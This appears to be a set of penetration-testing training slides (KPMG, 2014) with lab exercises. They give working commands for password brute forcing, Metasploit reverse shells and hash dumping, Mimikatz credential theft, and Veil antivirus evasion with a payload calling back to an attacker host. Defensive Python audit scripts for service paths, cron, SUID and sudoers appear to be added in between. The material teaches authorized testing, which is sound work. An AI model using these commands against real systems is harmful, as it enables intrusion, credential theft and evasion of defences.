• Enumerate all vulnerabilities on BETA (10.0.2.3) and ECHO (10.0.2.7)

• How many critical and high risk vulnerabilities exist for each host?
• How many Metasploit exploits exist for each host?

Automated Password Guessing

• Automated password guessing is the process of trying different combinations of usernames and passwords against a login service using a programmed tool.
• It is possible to carry out a dictionary or brute force attack, which uses many combinations and iterations of characters at varying lengths.
• There are thousands of brute-force tools, some generic, some bespoke for different services. By far the best and most reliable are Medusa and Hydra – multi-purpose tools supporting multiple services.
• One of the best services to brute force is SMB – almost always open/available and very quick.
• It is best to try to brute force fast (unencrypted) login interfaces such as FTP, telnet, HTTP basic auth, POP3 et al.
• It can be useful to try this before actually exploiting vulnerabilities, BUT….

Password Bruteforcing – Be careful!

NOTE: before beginning this type of attack:

• Be aware of password policies, or at least take care when brute-forcing accounts on different services – (neat trick here)
• Make the client aware you will be performing this type of action.
• Use throw-away account credentials you have been provided, should this be a white-box scenario and you’re testing account or password reuse.
• If in doubt, only try 1 to 2 different passwords per user to minimise the potential impact.
• It may be possible to enumerate the account lockout policy remotely on Windows (see enum4linux).

Automated Password Guessing (medusa)

• It is possible to show all of the brute force modules in medusa with: -
  • medusa -d
• Then you can try brute force with a variety of options (usually a lower case flag = single value, whereas upper case = read from a file):
  • $ medusa -M <module> -u <username> -p <password> -e ns -h <host> -n <port (if not default)> -s -O <append to output file>
• Where: -
  • “-e ns” tries a password the same as the username (s) and a blank password (n) for all login attempts
  • -s specifies that the service uses SSL
• Example of brute-forcing FTP accounts on 10.10.10.10, taking usernames from the file ftpusers.txt with the password ftppass and also trying the password the same as the username: -
  • $ medusa -M ftp -U ftpusers.txt -p ftppass -e s -h 10.10.10.10 -O medusa.ftp.txt

Automated Password Guessing (hydra)

• It is possible to show all of the brute force modules in hydra with: -
  • hydra
• Then you can try brute force with a variety of options (usually a lower case flag = single value, whereas upper case = read from a file):
  • $ hydra -l <username> -p <password> -e ns -s <port (if not default)> -S -o <append to output file> <TARGET IP> <MODULE NAME> <MODULE OPTIONS>
• Where: -
  • “-e ns” tries a password the same as the username (s) and a blank password (n) for all login attempts
  • -S specifies that the service uses SSL
• Example of brute-forcing the SMB administrator account on 10.10.10.11 with passwords taken from the file smbpass.txt, also trying a blank password: -
  • $ hydra -f -l administrator -P smbpass.txt -e n -o medusa.smb.txt 10.10.10.11 smb

Windows Remote Exploitation

• It is also possible to attempt the exploitation of specific flaws in the software, setup and configuration of the target system.
• Different types of Windows exploitation include:
  • Exploiting actual software flaws in the Operating System or additional software installed (many Windows backup software remote listeners became targets) – Metasploit is your friend; ensure your copy is working and up-to-date. Spend time learning how to use it – it is an invaluable framework for infrastructure penetration testing.
  • Metasploit is an advanced tool that could have a training course to itself, but for further reading, an excellent resource is: http://www.offensive-security.com/metasploit-unleashed/Introduction
  • Remote shares are often open to abuse:
    • >net view \\<host>
    • >net use \\<host>\<sharename> (or just connect to \\<host> in an explorer window)
  • Misconfiguration of services – e.g. anonymous FTP, default passwords.

*nix Remote Exploitation

• Again: Metasploit is your friend
• Raptor exploits - http://www.0xdeadbeef.info/
• Exploit database – http://www.exploit-db.com
• Misconfigurations of common *nix services:
• SSH, SNMP, Finger, RPC Services (many exploits in Metasploit for older versions of
Solaris), TFTP.
• X Windows and X sessions abuse.
• Open NFS / SMB shares.
• Brute-force attacks against authenticated services (after enumeration of users via
services such as SNMP, finger, NFS etc.).
• Application-layer vulnerabilities.

Application Layer Remote Exploitation

• It is also possible to exploit additional applications that are installed on the system.
• Common quick wins with a high degree of confidence and low risk are:
• JBOSS and Tomcat manager (without credentials or with default username / password)
• Anything PHP can be a good bet
• Look out for Heartbleed and Shellshock too
• Investigate other web servers running on target systems to determine whether they
have default credentials, poorly configured scripts or leak useful information that might
be used to gain access to other elements of the service.

Using Metasploit (carefully!)
./msfupdate (or similar depending on how you use Metasploit)
> search <term*>
> use <exploit>
> show options
> info <module name> (gives info on the exploit, including a rating of how reliably it performs)
> set PAYLOAD <payload>
• A good PAYLOAD for Windows is: windows/meterpreter/reverse_tcp
> check (for some exploits, you can check whether the host is vulnerable)
> exploit
If the exploit works:
> getsystem
> hashdump
> search <term> is useful to search for exploits relating to different services or products

Windows Local Privilege Escalation

• Often on infrastructure tests you get access to a standard workstation/laptop/Citrix user session and are told to perform testing from there.
• Sometimes you have USB access or limited Internet connectivity for tool downloads, although sometimes you will not be able to update the platform at all.
• The typical scenario is to be given a low-privileged user account, therefore in order to do anything useful we need to try to escalate our privileges.

Windows Local Privilege Escalation

• Common strategies here include:
  • Searching local file systems (and any connected network shares) for files containing words like “password”, e.g. *.pass* – this also applies to Intranet searches.
  • Exploiting known local OS or application vulnerabilities – Metasploit or import of a specific exploit executable – Adobe/MS client vulnerabilities?
  • Booting into a bootable Linux distribution (USB or CD/DVD) and modifying/extracting the local SAM file to add a user or crack password hashes – this depends on a number of things such as BIOS settings, any hard disk encryption and any software restrictions/lockdowns on removable media.
  • Examination of running services and files, their privileges and possible abuse of these is often overlooked.

Windows Local Privilege Escalation

• More…
• Kon-boot
• Metasploit Browser autopwn
• Unquoted Service Paths
  • E.g. a service that runs as SYSTEM and is defined using an unquoted path of:
  • C:\SomeApp\Program Folder\bin\servicebinary.exe
  • If your user can create a file Program.exe in C:\SomeApp\, this will be executed instead, and Folder\bin\servicebinary.exe will be interpreted as arguments to the binary
  • Create the binary, place it in that location and reboot the box
  • SYSTEM access
• Metasploit also has lots of post modules that collect data or attempt escalation
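The unquoted-path lookup described above can be turned into a build-review check. The following added Python example (not from the training material; the service table, the writable-directory list and the service names are constructed) reproduces the candidate paths Windows tries for the slide's C:\SomeApp\Program Folder\bin\servicebinary.exe, flags candidates that fall in a user-writable directory, and shows the quoted ImagePath that removes the ambiguity.

```python
import ntpath
from typing import Dict, List

# Constructed service table, modelled on the slide's example; the service
# names, paths and the writable-directory list are made up for this illustration.
SAMPLE_SERVICES = {
    "SomeAppSvc": r"C:\SomeApp\Program Folder\bin\servicebinary.exe",
    "QuotedSvc": r'"C:\Other App\bin\service.exe" -k config',
    "NoSpaceSvc": r"C:\Windows\System32\svchost.exe",
    "VendorSvc": r"C:\Program Files\Vendor Tool\agent.exe",
}
# Directories a low-privileged user can write to on the (hypothetical) host.
LOW_PRIV_WRITABLE = [r"C:\SomeApp", r"C:\Users\Public"]


def candidate_binaries(image_path: str) -> List[str]:
    """Return the paths CreateProcess tries, in order, for a service ImagePath.

    A quoted path is unambiguous and yields only the quoted binary.  An
    unquoted path containing spaces is tried at every space: the prefix gets
    '.exe' appended if it has no extension, and the text after the space
    becomes the command line.  The final candidate is the whole string.
    """
    path = image_path.strip()
    if path.startswith('"'):
        end = path.find('"', 1)
        return [path[1:end] if end != -1 else path[1:]]
    candidates = []
    idx = path.find(" ")
    while idx != -1:
        prefix = path[:idx]
        candidates.append(prefix if ntpath.splitext(prefix)[1] else prefix + ".exe")
        idx = path.find(" ", idx + 1)
    candidates.append(path)
    return candidates


def _normalise(directory: str) -> str:
    return directory.rstrip("\\").lower()


def quote_image_path(image_path: str) -> str:
    """Remediation: wrap the binary path in quotes, keeping any arguments."""
    path = image_path.strip()
    if path.startswith('"'):
        return path
    cut = path.lower().find(".exe")
    if cut == -1:
        return f'"{path}"'
    cut += len(".exe")
    return f'"{path[:cut]}"{path[cut:]}'


def audit_service(name: str, image_path: str, writable_dirs: List[str]) -> Dict[str, object]:
    """Flag an unquoted ImagePath whose earlier candidates land in a writable dir."""
    candidates = candidate_binaries(image_path)
    writable = {_normalise(d) for d in writable_dirs}
    # Only the candidates *before* the intended binary matter: if one of them
    # sits in a user-writable directory, a planted file there wins the lookup.
    exposed = [c for c in candidates[:-1] if _normalise(ntpath.dirname(c)) in writable]
    return {
        "service": name,
        "unquoted_with_spaces": len(candidates) > 1,
        "candidates": candidates,
        "writable_candidates": exposed,
        "fix": quote_image_path(image_path) if exposed else None,
    }


def audit_all(services: Dict[str, str], writable_dirs: List[str]) -> List[Dict[str, object]]:
    """Return only the services that need fixing."""
    results = (audit_service(n, p, writable_dirs) for n, p in services.items())
    return [r for r in results if r["writable_candidates"]]


if __name__ == "__main__":
    for finding in audit_all(SAMPLE_SERVICES, LOW_PRIV_WRITABLE):
        print(finding["service"], "->", finding["writable_candidates"], "fix:", finding["fix"])
```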

Post local privilege escalation – what next?

• Unless ‘everything’ is in scope, inform the client of a compromise and request permission for further access into the network.
• The next step from local administrator is to escalate to Domain Administrator (or Enterprise Admin).
• Essentially ‘pivot’ from your new high-privileged location:
  • run ‘netstat -an’ to see whether there are any foreign connections to other network ranges.
  • Upload tools to the compromised host – Nmap etc.
  • Enumerate other domains and networks.
  • Dump password hashes and crack passwords (Cain & Abel, John the Ripper) or use the hashes to steal sessions.
  • Search for files containing *pass* etc. across all local disks and network folders (now that you have local administrator access).
  • Ideally, create a new local administrator account (KPMG or similar) and perform all further testing from there. At the end of testing you can then delete the entire account and associated files to remove the risk to the client.

Mimikatz

Wouldn't it be great if we could just read the plaintext password instead of cracking the
hash?
• Windows caches user passwords in memory in order to handle WDIGEST authentication
• Mimikatz can extract these passwords
• Available as standalone EXE (will get detected by AV)
• Meterpreter has it built in these days
• > use mimikatz
• > wdigest

Aside: Effective Password Cracking

• Rainbow tables are the best option for fast password cracking - ophcrack is a great
tool with good free tables. The downside is that rainbow tables take up disk space, so
it’s worth working out how you’re going to do your cracking in advance, make sure you
consider protective marking restrictions also.
• John the Ripper (JTR) – supports many hash types, and it is possible to automate
cracking with the MSF. In cases where the hashes are not salted, such as some MD5 or
SHA256 deployments, you can use Google as a cracking engine, as lots of indexed
sites have collision data on them.
• Ensure that you know what the password policy is on a host!
• It is a waste of time brute-forcing with inaccurate dictionary word-lengths, you should
customise your dictionary or JTR rules to crack against the relevant password policy.
More information can be found here: http://www.openwall.com/john/doc/RULES.shtml
• Lab or cloud cracking may also be an option. Think!
• KPMG’s Dutch team have a big password cracking capability, maybe we can become
friends 

Aside: Pass-the-Hash/Windows Credential Editor (WCE)

• Windows Credentials Editor (WCE) allows listing of logon sessions and adding, changing, and deleting the associated credentials (e.g. LM/NT hashes).
• This can be used, for example, to perform pass-the-hash on Windows and also to obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.), which can be used in further attacks.
• WCE v1.2 supports obtaining logon sessions and NTLM credentials just by reading memory, without performing code injection.
• Windows Credentials Editor supports Windows XP, 2003, Vista, 7 and 2008.
• Note: this tool requires administrator privileges and currently doesn’t run on 64-bit.
• Pass-the-hash functionality is available in Metasploit using Incognito.

Exercise 5: Duration 30 minutes

• Gain a remote interactive shell on ECHO (10.0.2.7) using Metasploit
• Bonus: get the password hashes from the host
• Extra bonus: decrypt the ‘administrator’ password

Anti-virus

The only trouble with Metasploit is that most anti-virus products detect and block many of its payloads.
• Even its default evasion techniques are detected!
• If you see something like this:

  [*] Fingerprint: Windows 2003 - Service Pack 1 - lang:Unknown
  [*] We could not detect the language pack, defaulting to English
  [*] Selected Target: Windows 2003 SP1 English (NX)
  [*] Attempting to trigger the vulnerability...

  and your payload never opens a session, there is a good chance AV is at play.

Evading Anti-virus

Depending on the exploit you have, options are available.
• The Veil Framework is an open source framework for developing binary payloads that will evade anti-virus
• It works VERY well
• Comprises a number of tools, notably Evasion and Catapult

Veil Evasion

• Evasion is the core tool which produces obfuscated binary payloads
• It can generate Metasploit payloads or its own
• Multiple formats including Windows PE, Ruby and Python
• Interactive menu-based or command line options available

Veil Evasion Command Line

Common command line options:

  # veil-evasion
  -p  Select or list payloads
  -c  Payload options
  -o  Output base

An example command line:

  veil-evasion -p c/meterpreter/rev_http -c LHOST 192.168.1.10 -o /tmp/VEIL

Veil Catapult

• Payload delivery tool that integrates with Veil Evasion
• Uses SMB to deliver the payload to a Windows target and trigger execution
• Uses the same technique as PSExec
• Needs admin credentials on the target
• Can generate the payload at runtime or use an existing binary

Veil Catapult Command Line

Common command line options:

  # veil-catapult
  -t        Target hostname or IP address
  --exe     Target executable to upload and run
  --winexe  Use the Windows Service EXE method
  --wmis    Use WMIS for triggering
  -U        Username
  -P        Password
  -cF       Credential file in HashDump format (Pass the Hash)
  --act     Action to perform. Upexec is most common.

Other options can be used which are passed to veil-evasion for payload generation.

An example command line (the long options take two dashes, as in the list above):

  veil-catapult -t somehost --exe /tmp/VEIL.exe --winexe -U administrator -P password --act upexec

Exercise 6: Duration 20 minutes

• Gain a remote interactive SYSTEM shell on BETA (10.0.2.3)

*nix Local Privilege Escalation

In *nix, think of EVERYTHING as a file. All *nix privilege escalations therefore relate to examination and manipulation of file permissions. Common escalation techniques include:
■ Cron: allows tasks to be run automatically in the background at regular intervals by the cron daemon; jobs are recorded in a crontab.
■ SUID/SGID and world-writeable files, services and scripts; permission manipulation.
■ .bash_history: if accessible, it often leaks information.
■ Search for files containing *pass*, *.bak etc.
■ Searching the /tmp directory often reveals interesting content.
■ Local exploits: exploit-db.
■ sudo: allows users to run programs with the security privileges of another user. If that user is root, then win! Check the sudoers file if accessible, or just try sudo bash.
■ Always be aware of ‘<element>.allow’ and ‘<element>.deny’ files; these can assist or prohibit escalation.

Crontab

The command to be executed may be a script/program that we can control; if it is in the system or root crontab, it will run as root!

File permission abuse

SUID = Set User ID
SGID = Set Group ID

When a SUID file is executed, the process which runs it is granted access to system resources based on the user who owns the file, not the user who created the process.

To find all world-writeable files: find / -perm -2 ! -type l -ls
To find all SGID files: find / -xdev -type f -perm +g=s -print
To find all SUID files: find / -xdev -type f -perm +u=s -print

http://catcode.com/teachmod/ is a great tutorial with interactive examples (in JavaScript). You can download it as a tar.gz file.
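As an added example (not from the slides), the checks behind the crontab slide and the three find commands above, written as a small Python audit script from the defender's side: it flags system crontab entries whose command is not an absolute path, is missing, or is writable by someone other than the job owner, and lists SUID, SGID or world-writable regular files under a directory tree. The fixture built by demo() is constructed in a temporary directory and is not real system data.

```python
import os, stat, tempfile

CRON_TIME_FIELDS = 5  # minute hour day-of-month month day-of-week
SPECIAL_BITS = ((stat.S_ISUID, "suid"), (stat.S_ISGID, "sgid"), (stat.S_IWOTH, "world-writable"))

def parse_system_crontab(text):
    """Yield (user, first command token) per job line in /etc/crontab format."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment or VAR=value assignment
        nfields = 1 if line.startswith("@") else CRON_TIME_FIELDS  # @reboot, @daily, ...
        parts = line.split(None, nfields)
        rest = parts[nfields].split(None, 1) if len(parts) > nfields else []
        if len(rest) == 2:  # both user and command present
            yield rest[0], rest[1].split()[0]

def cron_findings(crontab_text):
    """Map command -> reason: PATH lookup, missing target, or writable by a non-owner."""
    findings = {}
    for user, cmd in parse_system_crontab(crontab_text):
        if not cmd.startswith("/"):
            findings[cmd] = "resolved via PATH, not absolute"
        elif not os.path.exists(cmd):
            findings[cmd] = "target missing"
        elif os.stat(cmd).st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings[cmd] = "writable by group/other, runs as " + user
    return findings

def find_special_files(root):
    """Map relative path -> tags for SUID, SGID or world-writable regular files under root."""
    hits = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode  # lstat: do not follow symlinks
            tags = ",".join(tag for bit, tag in SPECIAL_BITS if mode & bit)
            if stat.S_ISREG(mode) and tags:
                hits[os.path.relpath(path, root)] = tags
    return hits

def demo():
    """Constructed fixture: world-writable script run by a root cron job, a SUID file, a clean file."""
    root = tempfile.mkdtemp()
    for name, mode in (("backup.sh", 0o777), ("helper", 0o4755), ("ok.txt", 0o644)):
        open(os.path.join(root, name), "w").close()
        os.chmod(os.path.join(root, name), mode)
    crontab = "PATH=/usr/bin\n# nightly\n0 2 * * * root %s/backup.sh --full\n@reboot root cleanup_tmp\n" % root
    return cron_findings(crontab), find_special_files(root)
```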

sudo

The configuration file is located at /etc/sudoers.
sudo -l lists the privileges of the current user.

Examples of configuration within the sudoers file:

  root ALL=(ALL) ALL

The above line means that the user ‘root’ can execute from ALL terminals, acting as ALL (any) users, and run ALL (any) commands.

  operator ALL= /sbin/poweroff

The line above allows the user ‘operator’ to run the command ‘poweroff’ from any terminal.
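An added example, not part of the slides: a small parser for user-specification lines in the sudoers format shown above, which rates each entry for an audit (ALL or a shell as the permitted command is rated critical, NOPASSWD high). The sample text is constructed; its first two specs are the slide's own lines, and tag handling is simplified to one set per entry rather than per command.

```python
import re

# user  host=(runas)  [TAG:] command[, command...]  -- the user-spec form on the slide
USER_SPEC = re.compile(r"^(\S+)\s+(\S+?)\s*=\s*(?:\(([^)]*)\)\s*)?(.+)$")
TAGS = {"NOPASSWD", "PASSWD", "NOEXEC", "EXEC", "SETENV", "NOSETENV"}
SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash", "/bin/zsh", "/bin/ksh"}
NON_SPEC = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")

def parse_sudoers(text):
    """Return one dict per user specification; other directives are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments (and #include lines)
        m = USER_SPEC.match(line) if line and not line.startswith(NON_SPEC) else None
        if not m:
            continue
        user, host, runas, rest = m.groups()
        tags, commands = set(), []
        for part in rest.split(","):
            cmd = part.strip()
            while ":" in cmd and cmd.split(":", 1)[0].strip() in TAGS:
                tag, cmd = cmd.split(":", 1)  # e.g. "NOPASSWD: ALL"
                tags.add(tag.strip())
                cmd = cmd.strip()
            commands.append(cmd)
        # no Runas_Spec means runas_default, which is root unless overridden
        entries.append({"user": user, "host": host, "runas": runas or "root",
                        "tags": tags, "commands": commands})
    return entries

def assess(entry):
    """'critical': any command (ALL) or a shell; 'high': NOPASSWD; else 'info'."""
    if "ALL" in entry["commands"] or any(c.split()[0] in SHELLS for c in entry["commands"] if c):
        return "critical"
    return "high" if "NOPASSWD" in entry["tags"] else "info"

def audit(text):
    """List (user, rating) in file order."""
    return [(e["user"], assess(e)) for e in parse_sudoers(text)]

# Constructed sample: the first two specs are the slide's own examples.
SAMPLE = """\
Defaults env_reset
root     ALL=(ALL) ALL
operator ALL= /sbin/poweroff
%wheel   ALL=(ALL) NOPASSWD: ALL
backup   ALL=(root) NOPASSWD: /usr/bin/rsync
dev      ALL=(root) /bin/bash   # a shell as root is as good as ALL
"""
```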

*nix local package checking and automating escalation vectors

Red Hat: rpm -qa
Debian: dpkg -l
Solaris: showrev -p shows the patches applied to the host; pkginfo shows which Sun packages are installed on the host

If your permissions allow upload, a host audit script can be executed to speed up the process of finding potential security issues.

unix-privesc-check:
unix-privesc-check is a script that runs on Unix systems (tested on Solaris 9, HPUX 11, various Linuxes, FreeBSD 6.2). It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps (e.g. databases). More information and download: http://code.google.com/p/unix-privesc-check/

Unix shells

Top tip when gaining a shell on a Unix/Linux host:
• You won't have a PTY
• Some commands won't run
• You can't easily redirect output to a file
• This simple Python one-liner can save the day (Python is nearly always installed):

  python -c 'import pty;pty.spawn("/bin/bash")'

SSH

• SSH is an awesome tool.
• TCP port forwarding and dynamic SOCKS proxying alone are worth using it for
• Fantastic for pivoting through Unix/Linux hosts
• The most important command lines to remember:
  ssh -L <local port number>:<remote IP address>:<remote port number> host
  ssh -R <remote port number>:<local IP address>:<local port number> host
  ssh -D <local port number> host

Example:

  ssh -L 80:192.168.1.1:80 192.168.1.5

We can now connect to localhost:80, which will in turn connect us to 192.168.1.1 on tcp/80 via the host 192.168.1.5.

Exercise 8: Exploiting NFS and SSH configurations

• Step 1: Enumerate open ports on epsilon (10.0.2.12)
• During this example we will be using:
  • the rpcinfo command
  • the showmount command
  • the mount command
  • ls to enumerate file permissions
  • adding users LOCALLY on your system to create user names that match REMOTE UIDs and get around REMOTE file and directory permissions
• Get root

Reflection: Key Learning Points

• Identify live hosts
• Gain an understanding of the network routing (map)
• Enumerate open ports/running services
• Enumerate usernames and password policies
• Enumerate misconfigurations: open network shares, poorly configured services
• Enumerate versions of services, and vulnerabilities in those versions
Repeat
• Identify available, reliable exploits
• Brute-force user accounts and execute reliable exploits
• Gain interactive shells/command execution
• Elevate privilege; pivot if necessary
• Job done.

Useful Guides/Lists/Tools

http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html
http://www.mindcert.com/resources/

© 2014 KPMG LLP, a UK limited liability partnership, a subsidiary of KPMG Europe LLP and a member firm of the KPMG network of independent member firms affiliated with KPMG International Cooperative ('KPMG International'), a Swiss entity. All rights reserved.

The KPMG name, logo and ‘cutting through complexity’ are registered trademarks or trademarks of KPMG International Cooperative (KPMG International).
